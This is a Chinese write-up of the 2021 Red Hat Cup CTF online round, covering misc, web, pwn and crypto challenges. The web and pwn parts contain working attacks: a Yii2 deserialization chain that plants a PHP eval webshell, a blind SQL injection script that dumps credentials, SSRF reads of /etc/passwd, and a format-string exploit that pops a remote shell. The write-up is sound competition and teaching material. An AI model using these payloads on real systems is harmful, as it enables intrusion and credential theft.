末 初
末 初

2021第四届红帽杯网络安全大赛-线上赛Writeup

文章目录

  • MISC
    • 签到
    • colorful code
    • PicPic
  • WEB
    • find_it
    • framework
    • WebsiteManger
    • ezlight
  • PWN
    • parser
  • CRYPTO
    • primegame

记录一下被锤爆的一天…orz

MISC

签到

2021第四届红帽杯网络安全大赛-线上赛Writeup_第1张图片
签到抢了个二血2333,第一次拿二血呜呜呜,虽然是签到,还是很激动。

附件名称叫EBCDIC.zip

010Editor直接选择EBCDIC编码
2021第四届红帽杯网络安全大赛-线上赛Writeup_第2张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第3张图片

flag{we1c0me_t0_redhat2021}

colorful code

2021第四届红帽杯网络安全大赛-线上赛Writeup_第4张图片
这题可惜了,当我想出来怎么做的时候,已经没有时间来写脚本了…

首先题目名称提示:colorful code,这点当时第一时间想到了前段时间安恒赛misc有一题colorful porgramming
2021第四届红帽杯网络安全大赛-线上赛Writeup_第5张图片
colorful porgramming详情见:https://www.bertnase.de/npiet/

附件中data1是文本文件,data2是数据文件,用hexdump查看如下
2021第四届红帽杯网络安全大赛-线上赛Writeup_第6张图片
data1中是0-19的数字,用空格分开。也看不出什么别的(当时在这浪费了比较多的时间)。
2021第四届红帽杯网络安全大赛-线上赛Writeup_第7张图片
data1暂时也看不出来和图片有什么关系,所以图片的线索在data2

咋一看也和图片没什关系,但是当我们将每一个字节的十六进制转换成RGB十进制,三个一组

from binascii import *

with open('data2','rb') as f:
    f = hexlify(f.read()).decode()
    n = 0
    color_list = []
    for i in range(0,len(f),2):
        i = f[i:i+2]
        color_list.append(int(i,16))
        n += 1
        if n == 3:
            print(tuple(color_list))
            color_list = []
            n = 0
        else:
            continue

运行结果

PS C:\Users\Administrator\Downloads\colorful_code-1> python .\code.py
(0, 0, 0)
(0, 0, 192)
(0, 255, 255)
(0, 255, 0)
(255, 192, 255)
(255, 192, 192)
(192, 192, 255)
(192, 192, 0)
(255, 0, 255)
(255, 0, 0)
(192, 0, 0)
(192, 0, 192)
(255, 255, 255)
(255, 255, 0)
(255, 255, 192)
(0, 192, 0)
(0, 192, 192)
(192, 255, 255)
(192, 255, 192)
(0, 0, 255)
(20, 20, 20)
(21, 21, 21)
(22, 22, 22)
(23, 23, 23)
(24, 24, 24)
(25, 25, 25)
.......
(250, 250, 250)
(251, 251, 251)
(252, 252, 252)
(253, 253, 253)
(254, 254, 254)
(255, 255, 255)

很明显,前20组数据和后面的数据不太一样。然后联想到前面data1中只有0-19的数字,猜测data10-19应该是对应data2种这二十组像素数据的下标。

OK,那么思路到这里就很清楚了。我们将这二十组RGB像素,按照data1中的顺序,将这些像素putpixel()即可。

思考到这里的时候还有最后一个问题,那就是生成的图片的宽高。要知道宽高,我们首先要知道图片的总像素,总像素,直接计算下data1中有多少个0-19数字。

Python简单处理

def str2list():
    with open('data1.txt') as f:
        f = f.read()
        index_list = f.split(' ')
        return index_list

print(str2list())
print(len(str2list()))


这里需要注意,因为data1最后有两个空格,所以会切多一个元素出来,去掉即可。所以这里总像素是:7067

7067看起来不像是一个比较常见的图片总像素数,不太好计算,直接在线分解质因数得到宽高

分解质因数:http://tools.jb51.net/jisuanqi/factor_calc

2021第四届红帽杯网络安全大赛-线上赛Writeup_第8张图片
就先推测宽为: 37,高为: 191

OK,接下来直接Python简单处理下即可得到flag.png

# -*- coding:utf-8 -*-
# Author: mochu7
import PIL
from PIL import Image
from binascii import *

def str2list():
    with open('data1.txt') as f:
        f = f.read()
        index_list = f.split(' ')
        return index_list

def num2color():
    with open('data2','rb') as f:
        f = hexlify(f.read()).decode()
        n = 0
        idx = 0
        color_dic = {
     }
        color_list = []
        for i in range(0,len(f),2):
            i = f[i:i+2]
            color_list.append(int(i,16))
            n += 1
            if n == 3:
                color_dic[idx] = tuple(color_list)
                color_list = []
                n = 0
                idx += 1
            elif idx == 20:
                break
    return color_dic

def genimg():
    width, height = 37, 191
    img = Image.new("RGB",(width,height))
    imgpixels = str2list()
    colorlist = num2color()
    pixlist = []
    for pix in imgpixels:
        pixlist.append(colorlist[int(pix)])
    idx = 0
    for w in range(width):
        for h in range(height):
            img.putpixel([w,h], pixlist[idx])
            idx += 1
    img.save('flag.png')


if __name__ == '__main__':
    # print(len(str2list()))
    # print(num2color())
    genimg()

2021第四届红帽杯网络安全大赛-线上赛Writeup_第9张图片
npiet online:https://www.bertnase.de/npiet/npiet-execute.php

2021第四届红帽杯网络安全大赛-线上赛Writeup_第10张图片
得到flag

flag{88842f20-fb8c-45c9-ae8f-36135b6a0f11}

PicPic

待复现…

WEB

find_it

2021第四届红帽杯网络安全大赛-线上赛Writeup_第11张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第12张图片
目录扫描发现robots.txt
2021第四届红帽杯网络安全大赛-线上赛Writeup_第13张图片
存在1ndexx.php,直接访问并没有什么信息。猜测存在vim备份文件
访问view-source:http://eci-2zefc95c45rhg0wuefre.cloudeci1.ichunqiu.com/.1ndexx.php.swp拿到源码

 $link = mysql_connect('localhost', 'root'); ?>
<html>
<head>
	<title>Hello worldd!</title>
	<style>
	body {
     
		background-color: white;
		text-align: center;
		padding: 50px;
		font-family: "Open Sans","Helvetica Neue",Helvetica,Arial,sans-serif;
	}

	#logo {
     
		margin-bottom: 40px;
	}
	</style>
</head>
<body>
	<img id="logo" src="logo.png" />
	<h1> echo "Hello My freind!"; ?></h1>
	 if($link) {
      ?>
		<h2>I Can't view my php files?!
	
		
MySQL Server version: 

	


code'];

if(preg_match('/system|eval|exec|base|compress|chr|ord|str|replace|pack|assert|preg|replace|create|function|call|\~|\^|\`|flag|cat|tac|more|tail|echo|require|include|proc|open|read|shell|file|put|get|contents|dir|link|dl|var|dump/',$a)){
     
	die("you die");
}
if(strlen($a)>33){
     
	die("nonono.");
}
fwrite($hack,$a);
fwrite($hack,$I_know_you_wanna_but_i_will_not_give_you_hhh);

fclose($file);
fclose($hack);
?>

正则没有忽略大小写,本来是怎么想办法怎么绕过disable_functionflag.php的,但是写入查看phpinfo()的时候发现

/index.php?code=phpinfo();?>

访问hack.php
发现flag被记录进了phpinfo的全局变量里,送分了
2021第四届红帽杯网络安全大赛-线上赛Writeup_第14张图片
这题应该非预期了

framework

2021第四届红帽杯网络安全大赛-线上赛Writeup_第15张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第16张图片
Yii框架,目录扫描发现www.zip
2021第四届红帽杯网络安全大赛-线上赛Writeup_第17张图片
源码中简单看了下,知道这是Yii2框架,搜索引擎找一下如何查看Yii2的版本
2021第四届红帽杯网络安全大赛-线上赛Writeup_第18张图片
本地调试,在web/index.php中添加一行echo Yii::getVersion();
2021第四届红帽杯网络安全大赛-线上赛Writeup_第19张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第20张图片
得到当前版本信息:2.0.32

搜索引擎找这个版本或者更高版本的漏洞

最后发现是一个CVE-2020-15148的反序列化RCE

网上相关利用文章很多,我参考的是以下两篇:

  • https://anquan.baidu.com/article/1260
  • https://0xkami.top/2020/10/26/0x08cve-2020-15148-Yii2反序列化漏洞复现/

2021第四届红帽杯网络安全大赛-线上赛Writeup_第21张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第22张图片

/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NzoicGhwaW5mbyI7czoyOiJpZCI7czoxOiIxIjt9aToxO3M6MzoicnVuIjt9fX19

得到一个不完整的phpinfo
2021第四届红帽杯网络安全大赛-线上赛Writeup_第23张图片
之后测试的时候,发现systemeval之类的一些函数好像都没有效果,猜测可能设置了disable_functions

不过最后发现assert能用、file_put_contents()也能用


namespace yii\rest{
     
    class CreateAction{
     
        public $checkAccess;
        public $id;

        public function __construct(){
     
            $this->checkAccess = 'assert';
            $this->id = 'file_put_contents(\'mochu7.php\',\'\');';
        }
    }
}

namespace Faker{
     
    use yii\rest\CreateAction;

    class Generator{
     
        protected $formatters;

        public function __construct(){
     
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
     
    use Faker\Generator;

    class BatchQueryResult{
     
        private $_dataReader;

        public function __construct(){
     
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
     
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

/index.php?r=site/about&message=GET%20/r=site/about&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjU5OiJmaWxlX3B1dF9jb250ZW50cygnbW9jaHU3LnBocCcsJzw/cGhwIGV2YWwoJF9QT1NUWzddKTs/PicpOyI7fWk6MTtzOjM6InJ1biI7fX19fQ==

2021第四届红帽杯网络安全大赛-线上赛Writeup_第24张图片
上蚁剑,用插件。
phpinfo的信息显示这里是Apache/2.4.6 (CentOS) PHP/5.6.40
选择Apache_mod_cgi
2021第四届红帽杯网络安全大赛-线上赛Writeup_第25张图片

WebsiteManger

2021第四届红帽杯网络安全大赛-线上赛Writeup_第26张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第27张图片
查看源码
2021第四届红帽杯网络安全大赛-线上赛Writeup_第28张图片
图片的id貌似是跟数据库存在交互的
2021第四届红帽杯网络安全大赛-线上赛Writeup_第29张图片
长度177的都是被过滤的关键字

布尔盲注

/image.php?id=if(1=1,1,5)	True
/image.php?id=if(1=2,1,5)	False

条件为真时?id=1,回显第一张图片,条件为假时?id=5,没有id=5的图片,什么都没有。即可作为布尔盲注判断条件

编写简单的Python盲注脚本

import string
from requests import *

allstr = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\]^_`{|}~'

myurl = 'http://eci-2ze8j3xqhbs4y2thbqra.cloudeci1.ichunqiu.com/image.php'

info = ''
for i in range(1,50):
    for s in allstr:
        payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))
        resp = get(url=myurl+payload)
        if len(resp.text) > 4000:
             info += s
             print(info)

payload = '?id=if((ascii(mid(database(),{},1))={}),1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=\'ctf\'),{},1))={},1,5)'.format(i,ord(s))

payload = '?id=if(ascii(mid((select/**/group_concat(username,password)/**/from/**/ctf.users),{},1))={},1,5)'.format(i,ord(s))

注入查询到信息

Current_database: ctf

Tables_in_ctf: images,users

Columns_in_users: username,password

2021第四届红帽杯网络安全大赛-线上赛Writeup_第30张图片
得到账户admin,密码441cc8327a306b48b7a32

登录admin
2021第四届红帽杯网络安全大赛-线上赛Writeup_第31张图片
curl.php这里应该存在SSRF

尝试file://协议去读文件

file:///etc/passwd

2021第四届红帽杯网络安全大赛-线上赛Writeup_第32张图片
2021第四届红帽杯网络安全大赛-线上赛Writeup_第33张图片
直接读file:///flag
2021第四届红帽杯网络安全大赛-线上赛Writeup_第34张图片

ezlight

下面到了膜大佬时刻
orz…orz…orz…orz…orz…orz…orz…
Y1ngyyds!!!
https://www.gem-love.com/websecurity/2763.html

以下是队友的wp存放处,并不是本人写的,本人是个只会做Web&Misc的菜鸟

PWN

parser

2021第四届红帽杯网络安全大赛-线上赛Writeup_第35张图片
主要是逆向工作,理清楚合法输入后就是简单的不限次数的格式化字符串。
在这里插入图片描述

from pwn import *

context.log_level = True
context.arch = "amd64"

#p = process("./pwn")
p = remote("47.105.94.48", 12435)

gadget_addr = [0x4f365, 0x4f3c2, 0x10a45c]

p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%15$p*%8$p*"
p.sendline(payload)
base_addr = int(p.recvuntil("*")[:-1], 16) - 0x14a8
stack_addr = int(p.recvuntil("*")[:-1], 16) + (0x7fffffffddd8 - 0x7fffffffd830)
log.info("base_addr: " + hex(base_addr))
log.info("stack_addr: " + hex(stack_addr))

p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n%22$saaaaa" + \
    p64(base_addr + 0x201F90)
p.sendline(payload)
libc_base = u64(p.recv(6).ljust(8, b"\x00")) - 0x110180
log.info("libc_base: " + hex(libc_base))
gadget_addr = libc_base + 0x10a45c
log.info("gadget_addr: " + hex(gadget_addr))

#gdb.attach(p, "b* 0x55555555537d\nb* 0x55555555539c\nb* 0x555555555634")
p.recvuntil("> ")
payload = b"GET /test HTTP/1.0\nContent-Length:-1\n\n11" + \
    fmtstr_payload(0x59, {
     stack_addr: gadget_addr}, 2, "short")
p.sendline(payload)

p.recvuntil("> ")
payload = b"getshell"
p.sendline(payload)

p.interactive()

CRYPTO

primegame

2021第四届红帽杯网络安全大赛-线上赛Writeup_第36张图片
背包问题

import math
from decimal import *
import random


getcontext().prec = int(100)

primes = [2]
for i in range(3, 90):
    f = True
    for j in primes:
        if i * i < j:
            break
        if i % j == 0:
            f = False
            break
    if f:
        primes.append(i)

keys = []
for i in range(len(primes)):
    keys.append(Decimal(int(primes[i])).ln())

arr = []
for v in keys:
    arr.append(int(v * int(16) ** int(64)))

ct = 425985475047781336789963300910446852783032712598571885345660550546372063410589918


def encrypt(res):
    h = Decimal(int(0))
    for i in range(len(keys)):
        h += res[i] * keys[i]

    ct = int(h * int(16)**int(64))
    return ct


def f(N):
    ln = len(arr)
    A = Matrix(ZZ, ln + 1, ln + 1)
    for i in range(ln):
        A[i, i] = 1
        A[i, ln] = arr[i] // N
        A[ln, i] = 64

    A[ln, ln] = ct // N

    res = A.LLL()

    for i in range(ln + 1):
        flag = True
        for j in range(ln):
            if -64 <= res[i][j] < 64:
                continue
            flag = False
            break
        if flag:
            vec = [int(v + 64) for v in res[i][:-1]]
            ret = encrypt(vec)
            if ret == ct:
                print(N, bytes(vec))


for i in range(2, 10000):
    print(i)
    f(i)

你可能感兴趣的:(CTF_WEB_Writeup,2021redhat,第四届红帽杯,Writeup)

  • 如果做到轻松在股市赚钱?只要坚持这三个原则。 履霜之人
    大A股里向来就有七亏二平一赚的说法,能赚钱的都是少数人。否则股市就成了慈善机构,人人都有钱赚,谁还要上班?所以说亏钱是正常的,或者说是应该的。那么那些赚钱的人又是如何做到的呢?普通人能不能找到捷径去分一杯羹呢?方法是有的,但要做到需要你有极高的自律。第一,控制仓位,散户最大的问题是追涨杀跌,只要涨起来,就把钱往股票上砸,然后被套,隔天跌的受不了,又一刀切,全部割肉。来来回回间,遍体鳞伤。所以散户首
  • 对于写作者最重要的两点:热情和分享 鱼和熊掌兼得
    【热情】在开头,塔奇曼提到光有热情是不够的。但是,要想长期的坚持写作,没有热情是不行的。很多人都说,这是一个对写作者很优待的时代,也有很多人前仆后继的写作。在写作这条路上的人,始终很多,一些人来了,一些人走了,但是能坚持下来的却只有那么几个。不知道什么时候开始,写作变现这个词火了起来。不管是谁,都想来分一杯羹。可是写作变现真的没有这么容易,鱼哥说过,写作的人千千万万,能变现的也不过是其中的千分之一
  • OPENAIGC开发者大赛企业组AI黑马奖 | AIGC数智传媒解决方案 RPA中国 人工智能AIGC传媒
    在第二届拯救者杯OPENAIGC开发者大赛中,涌现出一批技术突出、创意卓越的作品。为了让这些优秀项目被更多人看到,我们特意开设了优秀作品报道专栏,旨在展示其独特之处和开发者的精彩故事。无论您是技术专家还是爱好者,希望能带给您不一样的知识和启发。让我们一起探索AIGC的无限可能,见证科技与创意的完美融合!创未来AI应用赛-企业组AI黑马奖作品名称:AIGC数智传媒解决方案参赛团队:深圳市三象智能技术
  • 上班的路 毛毛虫小姑娘
    七点半起床,拉开窗帘,天公不作美今儿是个阴雨天,天灰蒙蒙的,毛毛雨细细密密洒落下来。脑海里的两个小人开始斗争了,一个说:“毛毛雨啦,穿着风衣打着伞穿行在雨中,是一道亮丽的风景,说不定能遇见帅哥呢!”一个说:“不要不要,走到公司衣服鞋子都潮呼呼的,趴在身上很不舒服,外面湿气这么重,对身体不好!”我思索片刻,慢吞吞为自己冲了杯五谷粉,悠哉悠哉喝完去坐班车了。
  • 2021-01-09 哥伦比亚 《梦中的欢快葬礼和十二个异乡故事》 加西亚·马尔克斯 著 罗秀 译 juneyale
    《梦中的欢快葬礼和十二个异乡故事》哥伦比亚加西亚·马尔克斯著罗秀译序《总统先生,一路走好!》“再给我一杯咖啡。”他用纯正的法语说。随即补充道:“要意式咖啡,能让人起死回生的那种。”并没有意识到话里的双关含义。当火车开始加速,荷马突然发现总统的手杖还在自己手中,于是跑到站台尽头,把手杖用力扔过去,希望总统能在半空中接住。但是手杖掉在了铁轨上,随即被碾得粉碎。那真是恐怖的一瞬。拉萨拉看到的最后一幕是那
  • 感恩日记Day 236 E姐小酒窝
    图片发自App1.感谢16愿意听我"唠叨",人与人的信任和托付在此刻弥足珍贵珍贵;2.感谢到家就能吃上美味的中餐,辛苦妞爸;3.感谢妞中午愿意听我叼叼旅行中的事儿;4.感谢星巴克就在家附近,让我一杯回魂;5.感谢美妞总结我和爸爸优点并说两者揉和就很棒了。6.感谢看到妞第一天数学成绩后淡定的自己;将责任归回妞自己并总结行动。7.感谢林姐姐信任,又定变啦减脂套餐。8.感谢梅姐知道我旅行回来后约我吃饭;
  • 每日宋词14:《虞美人·听雨》 爱笑的77呀
    三杯酒吐真言,道不尽的世事沧桑,数不清的悲欢离合。心怀凌云志,身负万里情,语短情长,甘作老黄牛。《虞美人·听雨》蒋捷少年听雨歌楼上,红烛昏罗帐。壮年听雨客舟中,江阔云低,断雁叫西风。而今听雨僧庐下,鬓已星星也。悲欢离合总无情,一任阶前,点滴到天明。悲欢离合总是无情,豪情壮年与浪漫少年一去不复返,取而代之的是两鬓斑白的老人,满目疮痍漂泊流离。同为听雨,不同阶段,不同感触,壮志雄心与莺莺燕尔已被雨打风
  • 剧本杀《暗黑者·七宗欲》复盘详细解析+凶手角色剧透答案真相 VX搜_小燕子复盘
    为了你获得更好的游戏体验,本文仅显示《暗黑者·七宗欲》剧本杀部分真相复盘,获取完整真相复盘只需两步①【微信关注公众号:集美复盘】②回复【暗黑者·七宗欲】即可查看获取哦﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎﹎1、剧本杀《暗黑者·七宗欲》角色介绍朱思俊沙害杜光荣的手法:接到杜光荣的电话之后,朱思俊约对方在地下室见面细聊。朱思俊出门时携带了老冰棍(放在保温杯中)、白砂糖、鱼线
  • 2024年华为杯数学建模研赛C题思路代码+论文助攻 DS数模 2024华为杯数学建模华为2024华为杯2024研究生数学建模2024研赛
    2024年华为杯研究生数学建模竞赛(以下简研赛)将于9月21日上午8时正式开始。下文包含:2024研赛思路解析、研赛参赛时间及规则信息说明、好用的数模技巧及如何备战数学建模竞赛C君将会第一时间发布选题建议、所有题目的思路解析、相关代码、参考文献、参考论文等多项资料,帮助大家取得好成绩。2024年研赛将于9月21日上午8时正式开始这里有些资料,大家可以看看:【2024最全国赛研赛数模资料包】C君珍贵
  • 若爱无疾,该当如何?她曾经是他的命,后来是他的恨,最终成了他心尖上拔不去的刻骨衷情 皮皮我最皮
    温柔坐在宽大的包厢里面的一个沙发角落里,手上拿了一杯饮料,情绪不怎么高昂地窝在那里喝着,她看似轻松,漂亮的脸上还挂着淡笑与周边的大学同学们说话聊天,可余光之下却满是紧张。她怕他会来。可她又想他能来。今天是大学校友聚会,她原本也不想来的,可熬不过死党何乐的胡搅蛮缠。何乐说她既回来了,以后指不定会用到这些同学们,就算用不上,过来走个过场,跟同学们混混关系也是好的。温柔觉得何乐说的也对,就跟着来了。可自
  • 小儿咳嗽治疗 毋梦
    家有小女,4岁,前段时间穿了一不透气的衣服跳床,出来后吹了阵风,当晚就嗓子哑了,第二天带她去古镇玩,嗓子哑加重,于是买了一杯暖和和的冰糖雪梨粥,想润润嗓子,没有大的效果。观察她的舌苔,有些白,稍有点腻,再加上没有大便,前一天吃得有点多,想起家里还有午时茶颗粒,给吃了些。无效,且开始发烧,38度以上,睡着时喉咙不干净,有呼哧呼哧的声音,而且开始咳嗽,有点像小儿喉炎的症状,因为之前得过,知道这个疾病的
  • 中年夫妻为什么分房睡?两个过来人说出心里话! 喵咪说情
    人到中年,不管从哪一个方面来说,都意味着到了一个坎!身体不再像青年时候那么健康。所谓的:人到中年不得已,保温杯里泡枸杞!大概就是很多中年人的一个真实写照吧!仿佛到了这个年龄,人也一下子就变老了。对夫妻生活也不在那么用心了。总是觉得两个人在一起相伴走过了这么多年,彼此初恋时的激情早已经被生活磨灭殆尽。再加上生活中的柴米油盐酱醋茶以及孩子带来的各种问题,彼此之间的理解与交流变得更少,所以许多的中年夫妻
  • 蓝桥杯18小白第5题 @liu666 蓝桥杯算法职场和发展
    思维,#includeusingnamespacestd;#defineintlonglongconstintn=1e6+11;inta,b[n],c[n],d,k[n];structs{intx,y,z;}q[n];boolcmp(sa1,sa2){returna1.z>a;for(inti=1;i>q[i].x;}for(inti=1;i>q[i].y;q[i].z=q[i].x+q[i].y
  • 学生兼职的日常生活4 0f8cf7bfd36d
    今天顾客还蛮多的,但是员工好少,我们只能晚吃饭,早上起的太晚了,没有吃饭,上班没一会就饿得前胸贴后背了,太难过了,今天经理买了KFC,我蹭了挺多的,还有好心的同事请我喝了杯奶茶,嘻嘻~就是今天好热,可是我却感冒了,老是流鼻涕,给顾客点餐的时候,差点鼻涕都挂不住了,热感冒太难受了,温差有点大,大家要注意哦!
  • Cloud Native Weekly | 华为云抢先发布Redis5.0,红帽宣布收购混合云提供商 weixin_34302561 数据库devops大数据
    1——华为云抢先发布Redis5.02——DigitalOceanK8s服务正式上线3——红帽宣布收购混合云提供商NooBaa4——微软发布多项AzureKubernetes服务更新1华为云抢先发布Redis5.012月17日,华为云在DCS2.0的基础上,快人一步,抢先推出了新的Redis5.0产品,这是一个崭新的突破。目前国内在缓存领域的发展普遍停留在Redis4.0阶段,华为云率先发布了Re
  • 全运会结束了除了闭幕式无亮点外对西安发展大有裨益 新心芯达人
    前言昨天是最后一个比赛日,山东代表团单日揽4金,最后以58金55银47铜,总计160枚奖牌的成绩位列奖牌榜第一的位置,这已经是山东连续第四届全运会取得奖牌榜第一的成绩,以绝对的优势达成了四连冠成就,山东属实厉害!广东在本届全运会中也拼尽了全力,在26号的最后一个比赛日,狂揽6金,最后以54金,32银,56铜,总计142枚奖牌位列奖牌榜第二的位置,虽然最后一个比赛日爆发连夺6金,最后还是没有撼动山东
  • 死亡意味着什么 张野臻
    死亡意味着什么?再也不会有,一杯奶茶带来的心动,一个微笑产生的甜蜜,一次加班引起的焦躁,一个失误带来的崩溃,一次争吵引发的失眠。我们无法将死亡封死在门外,我们也同样不会将生命封死在门内。依然要,自自然然地心动,痛痛快快地受伤,毫不抵御地忧愁,再毫不回头地往前跑。恐惧是真实的,希望也是真实的。
  • 保温壶哪个品牌质量好?保温壶十大品牌排行榜 金钱保卫科长
    保温壶日常家用或者出门时候带上,都是非常方便的提供热水的神器!保温壶主要针对家居、会议等场所的固有特征而专业开发的一种新的产品类别,其前身由保温瓶、保温杯演变而来,也可称为咖啡壶。保温壶哪个品牌质量好?保温壶十大品牌排行榜淘宝/京东/拼多多/唯品会/外卖等平台超级红包|活动无门槛红包https://www.chaojiyouhui1-虎牌(Tiger)Tiger虎牌创于1923年日本,以生产热水瓶
  • 如果你是石头,就应该做磁石如果你是花, 就应该做玫瑰, 如果你是人,就应当做恋人! 墨辞的简书
    如果我们的距离太大,我愿意为了触及你而不断努力,也请你弯下腰拉我一把。爱是两个人的共同成长,然后一同成为巨人,而不是成为谁的巨人。我想,如果是小男孩读了这个故事,长大的他会变得体贴;如果是女孩子读了这个故事,长大的她会懂得自立。当鱼离开水的时候,鱼会活不下去,水也会失去生命。这是一个很美很美的爱情故事。简短几百字,朴实无华的用语,读来却像在品一杯香茗。淡淡的清香,不浓烈,闭上眼睛深呼吸,余香绕舌。
  • 半杯水的秘密 阿花_655c
    我觉得我到了该放弃的时候了,我一直觉得我还有很多要提升的地方,我需要更拼,做到更好,用命拼了一年多,终归还是拼不动了。不是身体拼不动,而是精神上的疲惫,我觉得自己就像半杯水,永远不会满,而我自己又希望能满一些,不断加水的过程中没发现杯子已经破了。我是一个自卑的人,总觉得自己能力不够,水平不行,恐怕不能胜任很多事情,一开始总有人劝我,你可以的,你已经做得很好。但是我总是不断否定自己,否认能力,渐渐的
  • 德家蒲可可:炎炎夏日,也要做到正确饮食 Q1gA99Ix
    夏至刚过,预示着接下来的天气会越来越炎热,今年的三伏天将持续四十天。持续的高温天气会让人没有胃口,食不下咽。在这个季节人的身体是会变得虚弱的,因此,我们要格外注意自己的身体健康,而吃是最好的调理身体的方法。蒲可可收集了一些在炎热的夏季,我们在饮食方面应该注意的一些问题。夏季饮食要点:1、饮食要注意少糖夏季的时候,吃一些甜品,点一杯饮料是很多人的选择。只是很多人不知道的是,夏季如果吃糖太多的话,是会
  • 关于小红帽 程月泓
    2月15日傍晚想着今天会不会吸引到“666”三个数字,其实这个数字是昨天发起的,但昨天没有应验,今天想着出门买水果能不能实现,一路上买了蛋糕,水果和瓜子,跑了三家店铺还没有出现这三个数字,然后我有点小失落地往回走,快到家门口那栋楼拐弯处,忽然我看到从我身旁疾驰而过的一辆车车牌号居然是6266,虽然没有连号,但竟然应验了这三个数字,感觉太神奇了,谢谢紫鱼老师的课,让我这么快体验到小红帽。
  • 未来的你,我的朋友 轻抚清晨
    朋友,未来的你会是什么样呢请不要在清晨拥挤的地铁中迷失如果那样请你买票回家你的梦灿烂如初阳亲长劝你回家乡你好像没有说话可你的不甘能被理解:你想闯一闯等到哪一天你经历够多,也许就决定卸下过重的包袱找个牵手旅游的人没有再拜访那座空城也无人知晓你曾爱得深沉人生苦短胜似泡制一杯咖啡越苦越成熟但别把自己搅得老态龙钟——《未来的你,我的朋友》轻抚清晨
  • 你的经历,如何走向自己的知识体系? 大秦笔记闲秦游记
    你的经历,如何走向知识体系?秦智勇知识体系,每一个人是逐步建立、形成与固化下来的,我正在路上。以前,我做职业经理人;现在,我是事业合伙人。经历过的一切,似乎皆为当下准备。选择了,就要持之以恒,所有的解答皆可用成本、积累的成本来解释。明天上班,其实今天自己与团队已在工作。时刻准备着的姿态就是最好的状态!来上一小段儿"打油诗",自己的写照,如此的真实。喝一杯茶,唱一首歌,写几段文字。我就是"大秦笔记"
  • 七律·月夜即题二首 雪窗_武立之
    其二柳边凉透一丝风,偏惹诗心寄寸衷。入夜鸟声惊耳畔,出云月影落杯中。暂凭清酒饮无醉,忙趁闲情歌不穷。遥忆他时多少句,独凭此韵共谁同?
  • 大尺度美剧,斯巴达克斯第一季结束,一杯毒酒助阵男主造反成功 舜子的简单日记
    最近处理了一些个人事务,写文章的时间明显减少,但是美剧《斯巴达克斯》我还是看完了第二遍。当然,只是第一季,我都有些迫不及待看第二季了,虽说换了主角,但那也是无奈之举,并不是出版方自己膨胀所致,谁让男主演完第一部就重病了呢?第一季最后一集,《血与沙》的剧情被推向了高潮,斯巴达克斯在知道自己的妻子死因后,决定开始复仇,他说服了一些人跟随他,但他最需要争取的还是克雷斯的帮助,因为在很多人眼中,克雷斯依旧
  • 研究表明,最好的养生方式,并非用钱保命,而是戒掉这四点 舒山有鹿
    01网络上流传着这么一句话,人到中年不得已,保温杯里泡枸杞。人到了一定的年纪,就只想“养生”,也不想做太多的事儿了。对于人来说,性命才是最为重要的,而其余的一切,还是稍微差了一点。在你看来,我们该怎么养生呢?有些人觉得,养生就是用钱堆出来的。只要吃得好,把什么人参燕窝山珍海味吃一遍,相信就能长寿到老。有些人觉得,养生就是吃保健品吃出来的。只要有钱,就能买不同的保健品,让自己的身体越来越好,安康一辈
  • Ansible架构介绍与安装 2401_86637445 ansible架构
    一、介绍Ansible什么是Ansible?Ansible是一款自动化运维工具,其主要功能是帮助运维实现IT工作的自动化、降低人为操作失误、提高业务自动化率、提升运维工作效率。实现了批量系统配置、批量程序部署、批量运行命令等功能。ansiblepuppetsaltstack主流的三种。ansible自动化运维工具被红帽收购阿里巴巴在用saltstackpython开发。无客户端,只需安装SSH、P
  • 省察与工程学 果大喵喵
    今日图片之,杯中的咖啡渍。土耳其人早在远古就有以茶渍,咖啡渍占卜观天的习俗。今天这个,是不是很像苏格拉底老爷爷?图片发自App苏格拉底曾教导我们,未经省察的人生是不值得过的。后来他有个主张二元论的学生叫柏拉图,强调物质与意识是两个独立的本原。老师总会有个唱反调的学生,柏拉图也不例外。亚里士多德大概是理工生的祖师爷,提出目的论,开创逻辑学,认为事物现象皆可被研究和总结。而几百年之后,我像当年念吕西亚
  • 我的成长感恩日记1354篇 解忧树洞Y
